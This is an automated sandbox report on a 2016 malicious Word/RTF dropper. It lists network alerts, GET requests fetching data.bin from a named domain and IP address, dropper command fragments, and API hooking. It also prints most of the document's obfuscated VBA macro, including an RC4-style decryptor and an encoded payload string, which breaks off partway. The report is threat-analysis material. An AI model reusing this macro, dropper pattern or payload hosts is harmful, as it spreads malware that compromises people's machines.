Aenean Gravida Nunc Limited.paymentc1.3qi71nn03he04mf_%4.rtf
This report is generated from a file or URL submitted to this webservice on August 10th 2016 15:46:45 (UTC) and action script Heavy Anti-Evasion
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v5.00 © Hybrid Analysis
Incident Response
Risk Assessment
- Network Behavior
- Contacts 1 domain and 2 hosts. View all details
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 8
-
External Systems
-
Detected Emerging Threats Alert
- details
-
Detected alert "ET CURRENT_EVENTS Zbot Generic URI/Header Struct .bin" (SID: 2018052, Rev: 6, Severity: 1) categorized as "A Network Trojan was detected" (Phishing, Exploit Kits)
Detected alert "ET TROJAN Generic .bin download from Dotted Quad" (SID: 2018752, Rev: 9, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.) - source
- Suricata Alerts
- relevance
- 10/10
-
Detected Emerging Threats Alert
-
General
-
Document spawns new processes
- details
- Document spawned a new process (macro present)
- source
- Indicator Combinations
- relevance
- 7/10
-
GETs files from a webserver
- details
-
"GET /data.bin HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: pataplouf.com
Connection: Keep-Alive"
"GET /data.bin HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 207.57.8.251
Connection: Keep-Alive" - source
- Network Traffic
- relevance
- 10/10
-
Document spawns new processes
-
Installation/Persistance
-
Found indicators of dropper code in the commandline
- details
-
Found "... P=52" "K9K.seND()" "Jh8Tf ..." on invoke of cmd.exe (Show Process)
Found "... "BXO7 K9K.RespoNseboDY" "Kho02=2 ..." on invoke of cmd.exe (Show Process), Found "... ORm=4" "Df.sAVEtoFIle Cr4Y7 & K ..." on invoke of cmd.exe (Show Process) - source
- Monitored Target
- relevance
- 5/10
-
Shows malicious Office specific indicators
- details
- The file contains VBA macros and spawned processes in a way typical for malicious Office files
- source
- Indicator Combinations
- relevance
- 10/10
-
Found indicators of dropper code in the commandline
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "213.186.33.168" (ASN: 16276, Owner: OVH SAS): ...
URL: http://pataplouf.com/data.bin (AV positives: 6/68 scanned on 08/10/2016 09:39:20)
URL: http://princesasporundia.com/ (AV positives: 2/68 scanned on 08/09/2016 11:55:44)
URL: http://pataplouf.com/data.bin%20HTTP/1.1 (AV positives: 3/68 scanned on 08/09/2016 08:44:46)
URL: http://www.pataplouf.com/sunglasses (AV positives: 2/68 scanned on 08/09/2016 08:42:05)
URL: http://pataplouf.com/ (AV positives: 2/68 scanned on 08/09/2016 08:32:52)
File SHA256: 1bd5fd9eb69e4e306cdc28ec6ee6a9db68f78ee767c5e09033ef66528d610a36 (AV positives: 15/54 scanned on 08/09/2016 10:48:18)
File SHA256: 0c8b939254627f5ad28de26ac2b143cdc7de49467f8097570050c48934d5a44b (AV positives: 1/53 scanned on 07/18/2016 10:37:19)
File SHA256: 5af506d60609a2e98a50707e32aee78b9b20402e603b3f55d03c3f8bccb63492 (AV positives: 1/55 scanned on 04/13/2016 05:58:38)
File SHA256: ba9ffd1fbb0a03dab0955439b4b25ae29c50d42e08b4bbb5408e07e22d43c2b8 (AV positives: 3/57 scanned on 04/11/2016 00:01:26)
File SHA256: 91a08334c89365e1c9c90cb0f5a8881e67141b21ac1683232ffcb125e3a970b7 (AV positives: 28/54 scanned on 01/31/2016 05:12:38) - source
- Network Traffic
- relevance
- 10/10
-
Malicious artifacts seen in the context of a contacted host
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
- Found keyword "Document_Open" which indicates: "Runs when the Word document is opened"
- source
- Static Parser
- relevance
- 10/10
-
Document contacts a domain
- details
- This kind of behavior is often seen on document exploits or macros utilized as a dropper
- source
- Indicator Combinations
- relevance
- 3/10
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
-
Suspicious Indicators 10
-
Anti-Reverse Engineering
-
Possibly checks for known debuggers/analysis tools
- details
-
"Nodulized disappointed exspoliation genitocrural addictions tangentially underedge membrane. Heft centerpunch klebsiella dignitary moneral. Nondemonstratively dedication sanguinometer bigeyes paddlefishes apprenticement. Eventuality foredating baetylic untriggered alanin sculpins syrringed quorum zonelet staatsraad exercised insulation leptene stalagmometer. Respirit xanthyl bardiglio matweed." (Indicator: "ntice")
"Racecourse encomiastic allocator's trollops cementation. Paracenteses bufonite implored ureteropyelonephritis duplicability archphylarch forbiddal enterocentesis. Sepian amphoteric nongratuitously transcription. Everymen janizary physicomental suffront warlords ramhood microphot setulose mufty forenotice. Tadpoledom retroinsular exonuclease grabens foughty lenticellate radiations dolite outrush esker." (Indicator: "ntice") - source
- File/Memory
- relevance
- 2/10
-
Possibly checks for known debuggers/analysis tools
-
Installation/Persistance
-
Executes a visual basic script
- details
- Process "wscript.exe" with commandline ""%APPDATA%\7421.vbs"" (Show Process)
- source
- Monitored Target
- relevance
- 10/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Fonts\staticcache.dat"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db"
"WINWORD.EXE" touched file "C:\Windows\system32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\system32\en-US\KERNELBASE.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3ADABADE-8D29-4EC4-8035-71CB97618CC1}.tmp"
"WINWORD.EXE" touched file "C:\Windows\system32\en-US\MSCTF.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EA1ABEFC-C34E-423C-A353-F53364F9C020}.tmp" - source
- API Call
- relevance
- 7/10
-
Executes a visual basic script
-
Network Related
-
Found potential IP address in binary/memory
- details
- "207.57.8.251"
- source
- File/Memory
- relevance
- 3/10
-
Uses a User Agent typical for browsers, although no browser was ever launched
- details
- Found user agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
- source
- Network Traffic
- relevance
- 10/10
-
Found potential IP address in binary/memory
-
System Security
-
Hooks API calls
- details
-
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
-
Hooks API calls
-
Unusual Characteristics
-
Contains embedded VBA macros with suspicious keywords
- details
- Found suspicious keyword "CallByName" which indicates: "May attempt to obfuscate malicious function calls"
- source
- Static Parser
- relevance
- 10/10
-
Contains embedded string with suspicious keywords
- details
-
Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "Lib" which indicates: "May run code from a DLL"
Found suspicious keyword "Windows" which indicates: "May enumerate application windows (if combined with Shell.Application object)"
Found suspicious keyword "CallByName" which indicates: "May attempt to obfuscate malicious function calls" - source
- File/Memory
- relevance
- 10/10
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "b800000000663d33c0bacce7540068dcf5b269c3" to virtual address "0x005DDCBC"
"WINWORD.EXE" wrote bytes "e9c532c0ee" to virtual address "0x77476143" ("OleLoadFromStream@OLE32.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba4ce8540068dcf5b269c3" to virtual address "0x005DDCFC"
"WINWORD.EXE" wrote bytes "e99e4847ee" to virtual address "0x77623D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0bacce6540068dcf5b269c3" to virtual address "0x005DDC3C"
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba4ce7540068dcf5b269c3" to virtual address "0x005DDC7C"
"WINWORD.EXE" wrote bytes "81e152fe" to virtual address "0x698A2A00" (part of module "CSS7DATA0009.DLL")
"WINWORD.EXE" wrote bytes "b135dcdd" to virtual address "0x69E99904" (part of module "RICHED20.DLL")
"WINWORD.EXE" wrote bytes "e93655a9ee" to virtual address "0x77043EAE" ("VariantClear@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "d444f3dd" to virtual address "0x69FA10AC" (part of module "MSPTLS.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba0ce6540068dcf5b269c3" to virtual address "0x005DDBDC"
"WINWORD.EXE" wrote bytes "4477e0d3" to virtual address "0x69963408" (part of module "MSCSS7EN.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0bacce8540068dcf5b269c3" to virtual address "0x005DDD3C"
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba8ce7540068dcf5b269c3" to virtual address "0x005DDC9C"
"WINWORD.EXE" wrote bytes "e92399abee" to virtual address "0x77045DEE" ("VariantChangeType@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e96033a9ee" to virtual address "0x77044731" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "b811110000663d33c0ba00a7ab0568dcf5b269c3" to virtual address "0x005DDCDC"
"WINWORD.EXE" wrote bytes "3bac0d9b" to virtual address "0x6AB4F530" (part of module "WWLIB.DLL")
"WINWORD.EXE" wrote bytes "c4ca617780bb617752ba61779fbb617708bb617746ce617761386277de2f6277d0d96177000000001779de774f91de777f6fde77f4f7de7711f7de77f283de77857ede7700000000" to virtual address "0x6EB61000" (part of module "MSIMG32.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba8ce6540068dcf5b269c3" to virtual address "0x005DDC1C" - source
- Hook Detection
- relevance
- 10/10
-
Contains embedded VBA macros with suspicious keywords
-
Hiding 1 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Informative 11
-
General
-
Contacts domains
- details
- "pataplouf.com"
- source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
-
"213.186.33.168:80"
"207.57.8.251:80" - source
- Network Traffic
- relevance
- 1/10
-
Contains embedded VBA macros
- details
-
File "ThisDocument.cls" (Streampath: "Macros/VBA/ThisDocument") has code: "Dim CVi64() As Integer
Dim A1K(67365000 / 7485) As Long, VrYp9(15561 - 5562) As Long
Private Function S2o2oc(XR As Long, VfqWf As Long) As Byte
OHajX0 = 59
Select Case OHajX0
Case 32
OHajX0 = OHajX0 + 1
Case 39
OHajX0 = OHajX0 + OHajX0
Case Else
OHajX0 = OHajX0 - 1
End Select
Dim Yuq As Long, SQy4f As Long
TS = 29
Select Case TS
Case 22
TS = TS + 1
Case 44
TS = TS + TS
Case Else
TS = TS - 1
End Select
For Yuq = (-1040 + 1088) To (5550 - 5493)
If Fm(XR, VfqWf, 1) = SQy4f Then S2o2oc = Yuq: Exit For
SQy4f = SQy4f + 1
Next Yuq
GRm = 18
Select Case GRm
Case 81
GRm = GRm + 1
Case 38
GRm = GRm + GRm
Case Else
GRm = GRm - 1
End Select
End Function
Private Function X1i(JCtdf() As Byte) As String
Jv = 64
Select Case Jv
Case 53
Jv = Jv + 1
Case 33
Jv = Jv + Jv
Case Else
Jv = Jv - 1
End Select
Dim UmrcUnn As Long
RyT = 85
Select Case RyT
Case 65
RyT = RyT + 1
Case 26
RyT = RyT + RyT
Case Else
RyT = RyT - 1
End Select
For UmrcUnn = 0 To UC(JCtdf)
PE6yBVJ = 27
Select Case PE6yBVJ
Case 40
PE6yBVJ = PE6yBVJ + 1
Case 54
PE6yBVJ = PE6yBVJ + PE6yBVJ
Case Else
PE6yBVJ = PE6yBVJ - 1
End Select
X1i = X1i & Ku(JCtdf(UmrcUnn))
WqRRId = 69
Select Case WqRRId
Case 51
WqRRId = WqRRId + 1
Case 78
WqRRId = WqRRId + WqRRId
Case Else
WqRRId = WqRRId - 1
End Select
Next UmrcUnn
Vai9o = 63
Select Case Vai9o
Case 70
Vai9o = Vai9o + 1
Case 21
Vai9o = Vai9o + Vai9o
Case Else
Vai9o = Vai9o - 1
End Select
End Function
Private Function ATmQ(CPrRpS As Integer) As Byte()
QUw = 60
Select Case QUw
Case 52
QUw = QUw + 1
Case 75
QUw = QUw + QUw
Case Else
QUw = QUw - 1
End Select
Dim TX7WeB3(1) As Byte, QUyO8 As Long, Tiz As Byte
Dp2 = 45
Select Case Dp2
Case 37
Dp2 = Dp2 + 1
Case 59
Dp2 = Dp2 + Dp2
Case Else
Dp2 = Dp2 - 1
End Select
For QUyO8 = 0 To 1
TX7WeB3(QUyO8) = (Int(CPrRpS / (2 ^ ((21432 / 2679) * (1 - QUyO8))))) And (7339 - 7084)
Next QUyO8
WGeQjZ = 7
Select Case WGeQjZ
Case 96
WGeQjZ = WGeQjZ + 1
Case 54
WGeQjZ = WGeQjZ + WGeQjZ
Case Else
WGeQjZ = WGeQjZ - 1
End Select
ReDim ATmQ(1) As Byte
CRbs = 95
Select Case CRbs
Case 57
CRbs = CRbs + 1
Case 74
CRbs = CRbs + CRbs
Case Else
CRbs = CRbs - 1
End Select
For QUyO8 = 0 To 1 \ 2
Tiz = TX7WeB3(QUyO8)
TX7WeB3(QUyO8) = TX7WeB3(1 - QUyO8)
TX7WeB3(1 - QUyO8) = Tiz
Next
XiLo3Jj = 69
Select Case XiLo3Jj
Case 22
XiLo3Jj = XiLo3Jj + 1
Case 20
XiLo3Jj = XiLo3Jj + XiLo3Jj
Case Else
XiLo3Jj = XiLo3Jj - 1
End Select
ATmQ = TX7WeB3
MXVL2uP = 68
Select Case MXVL2uP
Case 52
MXVL2uP = MXVL2uP + 1
Case 1
MXVL2uP = MXVL2uP + MXVL2uP
Case Else
MXVL2uP = MXVL2uP - 1
End Select
End Function
Private Function Qakja50(EDV3, KT8)
Qakja50 = EDV3 - (KT8 * (EDV3 \ KT8))
End Function
Private Function QQ8WF3e(Xd() As Byte, Abic() As Byte) As String
WcjwB = 29
Select Case WcjwB
Case 55
WcjwB = WcjwB + 1
Case 31
WcjwB = WcjwB + WcjwB
Case Else
WcjwB = WcjwB - 1
End Select
On Error Resume Next
EX = 62
Select Case EX
Case 83
EX = EX + 1
Case 72
EX = EX + EX
Case Else
EX = EX - 1
End Select
Dim QajmMu2(0 To 255) As Integer, EDU As Long, IdEBFi0 As Long, GtCbYX As Long, Bz9 As Byte, NcSJ5() As Byte, VmgEg() As Byte
DDda = 13
Select Case DDda
Case 59
DDda = DDda + 1
Case 93
DDda = DDda + DDda
Case Else
DDda = DDda - 1
End Select
ReDim NcSJ5(UC(Xd)) As Byte
YkGts0G = 66
Select Case YkGts0G
Case 10
YkGts0G = YkGts0G + 1
Case 52
YkGts0G = YkGts0G + YkGts0G
Case Else
YkGts0G = YkGts0G - 1
End Select
NcSJ5 = Xd
CGr = 73
Select Case CGr
Case 63
CGr = CGr + 1
Case 20
CGr = CGr + CGr
Case Else
CGr = CGr - 1
End Select
ReDim VmgEg(UC(Abic)) As Byte
KNFqh = 18
Select Case KNFqh
Case 30
KNFqh = KNFqh + 1
Case 66
KNFqh = KNFqh + KNFqh
Case Else
KNFqh = KNFqh - 1
End Select
VmgEg = Abic
FnYo = 8
Select Case FnYo
Case 98
FnYo = FnYo + 1
Case 96
FnYo = FnYo + FnYo
Case Else
FnYo = FnYo - 1
End Select
For EDU = 0 To (256275 / 1005)
QajmMu2(EDU) = EDU
Next EDU
UK7N = 92
Select Case UK7N
Case 90
UK7N = UK7N + 1
Case 22
UK7N = UK7N + UK7N
Case Else
UK7N = UK7N - 1
End Select
EDU = 0
D9cfN3L = 29
Select Case D9cfN3L
Case 95
D9cfN3L = D9cfN3L + 1
Case 21
D9cfN3L = D9cfN3L + D9cfN3L
Case Else
D9cfN3L = D9cfN3L - 1
End Select
IdEBFi0 = 0
LtsNuu = 51
Select Case LtsNuu
Case 28
LtsNuu = LtsNuu + 1
Case 23
LtsNuu = LtsNuu + LtsNuu
Case Else
LtsNuu = LtsNuu - 1
End Select
GtCbYX = 0
JV6dm = 66
Select Case JV6dm
Case 8
JV6dm = JV6dm + 1
Case 11
JV6dm = JV6dm + JV6dm
Case Else
JV6dm = JV6dm - 1
End Select
For EDU = 0 To (8746 - 8491)
IdEBFi0 = Qakja50((IdEBFi0 + QajmMu2(EDU) + VmgEg(Qakja50(EDU, (UC(Abic) + 1)))), ((1351 - 1095)))
Bz9 = QajmMu2(EDU)
QajmMu2(EDU) = QajmMu2(IdEBFi0)
QajmMu2(IdEBFi0) = Bz9
Next EDU
S72vhf = 51
Select Case S72vhf
Case 68
S72vhf = S72vhf + 1
Case 69
S72vhf = S72vhf + S72vhf
Case Else
S72vhf = S72vhf - 1
End Select
EDU = 0
DFOzp = 60
Select Case DFOzp
Case 91
DFOzp = DFOzp + 1
Case 72
DFOzp = DFOzp + DFOzp
Case Else
DFOzp = DFOzp - 1
End Select
IdEBFi0 = 0
YKH = 94
Select Case YKH
Case 76
YKH = YKH + 1
Case 3
YKH = YKH + YKH
Case Else
YKH = YKH - 1
End Select
GtCbYX = 0
Cp = 95
Select Case Cp
Case 45
Cp = Cp + 1
Case 95
Cp = Cp + Cp
Case Else
Cp = Cp - 1
End Select
For EDU = 0 To UC(Xd)
IdEBFi0 = Qakja50((IdEBFi0 + 1), (978944 / 3824))
GtCbYX = Qakja50((GtCbYX + QajmMu2(IdEBFi0)), (3011 - 2755))
Bz9 = QajmMu2(IdEBFi0)
QajmMu2(IdEBFi0) = QajmMu2(GtCbYX)
QajmMu2(GtCbYX) = Bz9
NcSJ5(EDU) = AtYJT(NcSJ5(EDU), (QajmMu2(Qakja50((QajmMu2(IdEBFi0) + QajmMu2(GtCbYX)), ((-2886 + 3142))))))
Next EDU
NVHJ = 85
Select Case NVHJ
Case 14
NVHJ = NVHJ + 1
Case 29
NVHJ = NVHJ + NVHJ
Case Else
NVHJ = NVHJ - 1
End Select
QQ8WF3e = X1i(NcSJ5)
BC3cvch = 90
Select Case BC3cvch
Case 47
BC3cvch = BC3cvch + 1
Case 77
BC3cvch = BC3cvch + BC3cvch
Case Else
BC3cvch = BC3cvch - 1
End Select
End Function
Private Function AtYJT(D7Z4DES, SkKP)
ANz4F = 75
Select Case ANz4F
Case 46
ANz4F = ANz4F + 1
Case 33
ANz4F = ANz4F + ANz4F
Case Else
ANz4F = ANz4F - 1
End Select
AtYJT = (D7Z4DES And Not SkKP) Or (Not D7Z4DES And SkKP)
Ve = 89
Select Case Ve
Case 15
Ve = Ve + 1
Case 13
Ve = Ve + Ve
Case Else
Ve = Ve - 1
End Select
End Function
Private Function UC(ByVal MqfK As Variant) As Long
LT = 93
Select Case LT
Case 49
LT = LT + 1
Case 9
LT = LT + LT
Case Else
LT = LT - 1
End Select
On Error GoTo SQPB
I918FU = 77
Select Case I918FU
Case 25
I918FU = I918FU + 1
Case 81
I918FU = I918FU + I918FU
Case Else
I918FU = I918FU - 1
End Select
Dim Oi58BO As Long, XLcL0F As Variant
EN3X = 25
Select Case EN3X
Case 94
EN3X = EN3X + 1
Case 59
EN3X = EN3X + EN3X
Case Else
EN3X = EN3X - 1
End Select
Do
XLcL0F = MqfK(Oi58BO)
Oi58BO = Oi58BO + 1
Loop
BFtR1 = 95
Select Case BFtR1
Case 35
BFtR1 = BFtR1 + 1
Case 90
BFtR1 = BFtR1 + BFtR1
Case Else
BFtR1 = BFtR1 - 1
End Select
SQPB:
KT = 77
Select Case KT
Case 37
KT = KT + 1
Case 83
KT = KT + KT
Case Else
KT = KT - 1
End Select
If Oi58BO = 0 Then Exit Function
WUceQsw = 73
Select Case WUceQsw
Case 62
WUceQsw = WUceQsw + 1
Case 96
WUceQsw = WUceQsw + WUceQsw
Case Else
WUceQsw = WUceQsw - 1
End Select
UC = Oi58BO - 1
CJk1C = 48
Select Case CJk1C
Case 11
CJk1C = CJk1C + 1
Case 49
CJk1C = CJk1C + CJk1C
Case Else
CJk1C = CJk1C - 1
End Select
End Function
Private Sub SG()
B91qYc = 46
Select Case B91qYc
Case 43
B91qYc = B91qYc + 1
Case 52
B91qYc = B91qYc + B91qYc
Case Else
B91qYc = B91qYc - 1
End Select
Dim JzvPy As String
FfxgB = 28
Select Case FfxgB
Case 97
FfxgB = FfxgB + 1
Case 88
FfxgB = FfxgB + FfxgB
Case Else
FfxgB = FfxgB - 1
End Select
Uk5I0y = 11
Select Case Uk5I0y
Case 75
Uk5I0y = Uk5I0y + 1
Case 9
Uk5I0y = Uk5I0y + Uk5I0y
Case Else
Uk5I0y = Uk5I0y - 1
End Select
JzvPy = "14932E16162E19808E12425E-22426E-10044E-16183E-13039E28459E1826E3401E1534E-1632E31064E26015E24154E23411E-13260E7995E21692E18390E24568E-27723E13132E11538E6488E-27425E31265E12534E-32380E1179E-6768E-18966E32256E13855E2256E-17982E20346E-30142E-29416E-16599E-17161E22958E-5278E-31716E-27782E198E377E6229E-26673E-1239E4841E1759E-27720E17366E11675E11289E30065E-20162E18393E-2337E-10856E-16130E31872E5762E-3619E24939E29985E25811E8251E-6600E7490E-25883E20685E11343E10598E-30175E-24176E32022E1943E-15213E-18022E2094E28264E-23810E16089E-12201E-19534E-21568E15437E15434E1810E16193E-18406E18832E-5195E17865E-18745E4174E-27901E9093E24822E-15832E21374E-439E-18334E-15544E-23415E1475E16470E-20323E10244E-12789E13011E15161E31523E9210E-21853E-3319E-26132E25035E-24580E-22338E13741E20095E-22298E-4042E-299"
XYU73 = 21
Select Case XYU73
Case 32
XYU73 = XYU73 + 1
Case 24
XYU73 = XYU73 + XYU73
Case Else
XYU73 = XYU73 - 1
End Select
JzvPy = JzvPy & "34E-29054E8678E7516E300E31199E-22073E-10010E-2975E32368E-21449E30460E17860E841E4187E15115E-21936E4866E-27480E17636E-15096E25956E-31129E-6878E26130E-26650E-22224E-9341E-29231E23060E-30144E16158E22479E12027E16495E-11858E15657E15069E16075E-7975E-25378E20743E31952E-17545E-10294E-11028E26737E-7777E28303E-22252E-22583E17289E26979E27632E28910E31528E13260E-10392E31205E21218E-26617E1902E-27322E-27834E27226E-15908E20161E-5129E-12170E-29196E-25113E-18532E22412E31957E27103E11042E29202E13937E7908E-22521E-17168E-24660E20200E17533E17975E-2291E-23101E-16334E-8187E15418E-4467E5553E-18255E-11537E-1653E-4013E15021E-26214E19772E-25541E-30401E-15892E25009E-15173E5795E11568E-24660E-21595E-8867E19515E-2769E-12446E2738E-5894E17597E14041E-1379E18999E-1641E-18851E30597E-620E-23476E-2229E18997E-21758E"
BX = 84
Select Case BX
Case 41
BX = BX + 1
Case 71
BX = BX + BX
Case Else
BX = BX - 1
End Select
JzvPy = JzvPy & "27803E15996E10362E-26454E-19953E-10666E24891E19473E19400E-29952E-27504E2932E12402E-2080E6253E3553E-5437E3561E-25370E-8146E-12116E-6668E-27559E12987E13090E27565E-29024E23945E-2601E-31269E-7862E-17817E10000E1089E-12200E-26510E26090E2793E7161E28447E-19945E-13889E-689E6870E29711E-14491E10835E12362E25229E1974E21875E3543E11386E6707E-26517E-17823E-942E22053E-28421E-8112E1138E-2995E-26830E18711E-12812E-30635E-21820E27188E-26640E-16598E-14169E-10499E-19701E-4486E-22438E-26294E18545E16847E26036E7848E14957E-28498E9881E-13726E-5987E30264E2128E-19864E-32109E-12250E-7554E-21080E19389E-3827E16775E-10714E-14519E31505E-26339E-15665E12180E-14030E9836E-4790E5619E29566E31887E12493E20426E-9212E-8019E26987E17877E20144E-25039E-12272E-2192E26581E-19531E20914E15477E2288E22087E-8393E-21229E-28902E-27"
AI5fy0 = 50
Select Case AI5fy0
Case 80
AI5fy0 = AI5fy0 + 1
Case 17
AI5fy0 = AI5fy0 + AI5fy0
Case Else
AI5fy0 = AI5fy0 - 1
End Select
JzvPy = JzvPy & "487E19118E-11145E16260E29072E10387E3060E15603E-18561E27921E-10021E20569E31574E-11452E-30798E19543E23651E10426E141E-15037E21978E10055E-9665E6475E3890E21083E25431E6028E-8817E-11165E4389E-14399E-11589E-14063E-8392E-32428E11964E-27194E19415E-8916E30341E2363E-29789E352E29206E3770E-30794E14314E-17836E4851E17344E11164E-30550E-23304E26492E-6753E25031E-12769E-27037E-9623E-12342E-28611E-18204E20462E-17854E-19095E22272E420E26709E6656E11733E-16121E-4329E-8202E-16182E-15371E1748E-16202E-26070E2637E-5915E-19658E13940E-23526E-353E-25933E-10905E11174E-30267E3536E21326E-17924E5242E-27956E24406E-30316E4417E-484E29127E15683E10504E-24070E-16247E-15668E29240E-15730E23427E6201E18974E-15686E-1853E-18335E17107E-14357E15643E24763E-5070E24996E-1297E-22009E-7696E32714E32186E-26394E-21120E18582E5130E26"
YCR9Z = 78
Select Case YCR9Z
Case 23
YCR9Z = YCR9Z + 1
Case 36
YCR9Z = YCR9Z + YCR9Z
Case Else
YCR9Z = YCR9Z - 1
End Select
JzvPy = JzvPy & "590E15659E-18774E-25721E-30434E-24489E-13753E-4579E-11957E14957E14052E12545E-13718E7826E6505E-27899E31517E-12670E4259E17910E-32313E13584E-32676E-1890E-10687E-24976E25031E26847E-417E-13453E8592E-14622E25785E14053E-16178E9802E23928E-11101E14299E15594E31223E14152E-23851E-10064E27868E20419E16634E26417E-6683E22621E4138E-18907E-11438E26496E25749E2410E22886E1545E-18140E16602E22953E14862E-4992E-27938E25055E16934E-17872E2366E26197E-1017E8285E24951E-8628E-19148E-27621E-23791E-519E7069E19947E25595E-31113E-1985E19203E19952E-6941E-27073E-27301E7378E-17498E-20325E6648E-16399E-4214E30010E-5823E-30694E-21323E1971E-22963E20192E19393E2269E-14567E13809E28234E18653E-11376E30391E12134E20362E-24694E-10275E5201E29803E-18099E8386E28532E-26790E8328E25788E-22573E-18441E-1592E31700E-5781E-18129E6590E-"
VE5LWn = 66
Select Case VE5LWn
Case 18
VE5LWn = VE5LWn + 1
Case 17
VE5LWn = VE5LWn + VE5LWn
Case Else
VE5LWn = VE5LWn - 1
End Select
JzvPy = JzvPy & "28539E18510E-1067E-28389E-16456E-21487E-6273E28604E29662E-9142E188E-25436E-6106E-11573E-32136E-14619E-240E10085E29626E2975E591E-17207E28001E-3478E-24965E10280E-1152E3877E29227E29071E-16867E6873E31596E-8052E-26952E-16167E250E-8741E-14206E-19719E21224E-32578E28000E-18590E-29625E4537E8741E23859E-32053E6533E-19598E7162E14827E-2553E26008E31469E-27059E31160E113E31978E-12554E17469E26654E29551E739E18683E-32149E-23512E-13125E16660E3301E2045E4077E15890E13730E-3247E-14255E13370E-16618E7452E26604E25554E31270E26247E2323E-5292E11510E6638E-1179E31661E13217E21761E-23288E-5573E3368E-17704E10312E-18684E-11103E-13866E27290E-21351E-496E709E20146E-28781E-1398E26759E-3808E-28516E-7785E-24820E-4817E-5258E-24447E6490E11661E3189E-2108E4801E-13387E26862E-3321E13923E-3269E26992E8268E-23425E21063E21328"
Vgmjqb8rN = 90
Select Case Vgmjqb8rN
Case 72
Vgmjqb8rN = Vgmjqb8rN + 1
Case 54
Vgmjqb8rN = Vgmjqb8rN + Vgmjqb8rN
Case Else
Vgmjqb8rN = Vgmjqb8rN - 1
End Select
